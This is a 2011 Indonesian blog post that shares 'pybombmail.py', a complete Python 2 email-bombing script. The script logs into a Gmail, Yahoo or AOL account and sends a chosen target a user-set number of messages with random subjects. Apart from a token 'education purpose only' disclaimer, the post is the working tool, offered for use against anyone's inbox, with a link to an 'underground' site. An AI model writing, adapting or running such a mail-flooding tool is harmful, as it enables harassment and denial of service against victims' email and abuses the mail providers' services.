Showing posts with label mail. Show all posts
Showing posts with label mail. Show all posts

Monday, December 05, 2011

pybombmail.py


how to... huhuhu


berikut script pythonnya 
(FIX, now with AOL mail):p


#!/usr/bin/python
#pybombmail.py by aBi71
#This code for education purpose only.
#Use it at your own risk !!!


import os
import smtplib
import getpass
import sys


server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')




to = raw_input('\nTo: ')
#subject = raw_input('Subject: ')
body = raw_input('Message: ')
total = input('Number of send: ')


if server == 'gmail':
        smtp_server = 'smtp.gmail.com'
        port = 587
elif server == 'yahoo':
        smtp_server = 'smtp.mail.yahoo.com'
        port = 25

elif server == 'aol':
        smtp_server = 'smtp.aol.com'
        port = 587

else:
        print 'Applies only to gmail,yahoo and aol. Visit www.kendari-underground.blogspot.com'
        sys.exit()


print ''


try:
        server = smtplib.SMTP(smtp_server,port)
        server.ehlo()
        if smtp_server == "smtp.gmail.com":
                server.starttls()
        server.login(user,passwd)
        for i in range(1, total+1):
                subject = os.urandom(9)
                msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
                server.sendmail(user,to,msg)
                print "\rTotal emails sent: %i" % i
                sys.stdout.flush()
        server.quit()
        print '\n Done !!!'
except KeyboardInterrupt:
        print '[-] Canceled'
        sys.exit()
except smtplib.SMTPAuthenticationError:
        print '\n[!] The username or password you entered is incorrect. FUCKYOU!!!'
        sys.exit()
#http://abi71.wordpress.com/2011/02/03/pybombmail-py/




cara menggunakan sbb :p





#os, opensuse 12.1 :p
#segala bentuk kerusakan yang di timbulkan anda tanggung sendiri.
Lanjut Baca....